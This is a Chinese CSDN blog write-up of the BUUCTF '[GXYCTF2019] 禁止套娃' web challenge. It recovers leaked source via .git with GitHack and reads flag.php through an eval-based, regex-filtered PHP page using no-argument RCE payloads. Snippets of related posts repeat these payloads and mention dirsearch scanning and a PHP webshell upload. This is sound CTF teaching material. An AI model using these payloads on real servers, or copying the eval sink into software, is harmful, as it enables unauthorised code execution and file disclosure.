buuctf--web--禁止套娃

最新推荐文章于 2024-08-10 18:49:59 发布
最新推荐文章于 2024-08-10 18:49:59 发布
阅读量239 收藏
点赞数
文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65766842/article/details/130028110
版权

首先我们打开题目

 我们查看网页的源代码,没有发现什么有用的信息,我们查询做题方法之后,知道可能是一道信息泄露的题目

参考资料:(信息泄露)

https://blog.csdn.net/qq_27920699/article/details/128347782?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168093327616800186559246%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168093327616800186559246&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-128347782-null-null.142^v82^insert_down1,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=ctf%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2&spm=1018.2226.3001.4187

信息泄露主要包括了:robots协议,备用文件,目录爆破,.git泄露

我们一个个的来尝试后发现这道题是.git的泄露

我们使用GitHack工具,py脚本跑一下得到后台源码

python GitHack.py http://XXXXXXXXXXX/.git/

 我们得到了.index.php的文件,我们打开来看看得到了源代码

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

我们让chatgpt翻译一下

 我们分析完题目之后开始进行漏洞的注入

首先我们运用get传参

exp=a(b())

得到了以上的反馈

 我们构建上传的payload

?exp=var_dump(scandir(current(localeconv())));

得到了一下反馈

 我们分析代码可以知道,只要可以打开flag.php文件就可以得到flag

我们使用highlight_file(__FILE__)函数来读取页面的源码。

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

得到flag

m0_65766842
关注
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3785
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
BUUCTF-WEB
ccfly1012的博客
11-02 3928
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
[BUUCTF刷题]禁止套娃
weixin_43952190的博客
07-01 2226
禁止套娃 exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); exp=show_source(array_rand(array_flip(scandir(pos(localeconv()))))); exp=show_source(session_id(session_start())); 进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git
BUUCTF WEB 禁止套娃1
qq_41696858的博客
12-08 756
打开场景,空荡荡的,啥也没有 正常思路,扫目录,dirsearch有防扫,dirmap 扫出来.git,源码泄露没跑了 GitHacker跑出来是空文件,我也不知道为啥 GitHack看看能不能找出什么有用的东西,跑出来index.php的源码 源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|ph
wp-buuctf-禁止套娃(无参绕过)【多方法】
bin789456的博客
11-08 2177
wp 一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。 试了下git泄露,有东西了: 打开得到的index.php,源码如下: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
web buuctf [GXYCTF2019]禁止套娃1
weixin_44214568的博客
03-24 1832
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
buuctf-[GXYCTF2019]禁止套娃1-详解-无参数rce
最新发布
chinese_cabbage0的博客
08-10 373
讲解了buuctf的[GXYCTF2019]禁止套娃题目的解题过程,非常详细,附有两种解题方法
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3468
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 535
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
BUUCTF web(五)
m0_46616663的博客
11-21 968
[GXYCTF2019]BabyUpload 传呗,先传个php一句话 检测后缀了,大小写也绕不过去 试了下别的后缀也不大行 抓包康康 抓包改后缀和content-type倒是能绕过,但是上传的文件依旧是一个jpg而不会被当作php解析 嘶。。。欸?等等 那还等啥,传它! 直接传也是不行的,抓包改下content-type 之前已经传过马了,连下试试 芜湖!flag在根路径里 拿来吧你! [BUUCTF 2018]Online Tool $host = escapeshellarg($h
BuuCTF [GXYCTF2019]禁止套娃详解(两种方法)
2301_76690905的博客
10-28 705
点入题目没有提示,常规抓包看源码扫目录,用dirsearch扫目录的时候扫出git第一眼看见第二个if语句,if(';R)?\)/', NULL, $_GET['exp']))可以看出这是典型的无参数rce,然后是后面的if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']),这里限制了phpinfo(),getcwd()这些函数用不了。
#WEB-buuctf-禁止套娃 1
weixin_52804141的博客
12-25 199
是一个黑名单绕过像et,na,info,dec,bin,hex,oct,pi,log,i不能使用。因为上述过滤的并未过滤 session_id() 所以我想到的使用 session_id来获取 flag。)时,可执行exp传递的命令。然后过滤了data协议,filter协议,php伪协议,phar。一,进入环境,在目录扫描未果,猜测可能是.git泄露,尝试一下。二,利用工具scrabble,果真是.git泄露。1,.git泄露,scrabble的使用。得到如下源码,开始代码审计。2,无参数RCE,通过。
被监督写博客-Day6
veinard_F的博客
10-09 248
今天做的这道题也不是很难,就是在做题的时候需要联系一些函数的功能,先记录一下这些函数: scandir()可以扫描当前目录下的文件 localeconv() 返回一包含本地数字及货币格式信息的数组 array_reverse()以相反的元素顺序返回数组 array_flip()交换数组的键和值 array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回 current()返回数组当前的值 next()将内部指针指向数组中的下一个元素,并输出 题目 [GXYCTF2019]禁止
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1470
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
BUUCTF-[GXYCTF2019]禁止套娃
yuqie的博客
04-06 306
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
BUUCTF:[GXYCTF2019]禁止套娃
末初的CSDN博客
12-08 1573
https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83 .git泄露,使用GitHack index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i',
BUUCTF-----[GXYCTF2019]禁止套娃
woshicainiao666的博客
03-17 568
highlight_file() 是 PHP 中的一个函数,用于以 HTML 格式高亮显示指定文件的 PHP 代码。想要查看当前目录下的文件,scandir(.)括号中必须带点,但是被过滤,所以找输出为点的函数就行。输出array,第一个就是点字符,所以在找一个输出array中第一个数值的函数。过滤et|na|info|dec|bin|hex|oct|pi|log字符。目录扫描,扫到.git泄露,使用工具查看到index.php的源码。是将数组进行移动,对返回值不行,只能另想个办法,
BUUCTF-WEB-[GXYCTF2019]禁止套娃
r1727337824的博客
08-29 496
.git源码泄露+代码审计 转载大佬的WP https://blog.csdn.net/weixin_43952190/article/details/107061554 1.打开网址只显示了flag在哪,查看源代码无任何有用信息 2.用御剑也没搜索到后台目录 3.这时候考虑源码泄露 打开网址 http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git 出现403错误 403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。
BUUCTF_Web_[GXYCTF2019]禁止套娃
阿刁〇的博客
08-21 414
[GXYCTF2019]禁止套娃 打开靶机:flag在哪里呢? 首先,这道题考查的是.git源码泄露,用GitHack拿到index.php python3 GitHack.py http://0e64e14f-e49c-4afe-aad4-ca0b15aad88a.node4.buuoj.cn:81/.git <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_ma
R语言管道技术实战:dplyr和magrittr应用解析
这样的代码读起来并不直观,因为它像俄罗斯套娃一样嵌套了多个函数。管道的引入改变了这一现状,它允许我们将操作顺序地连接起来,就像流水线一样: ```R xs %>% round(2) %>% unique %>% sort ``` 这样的写法,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值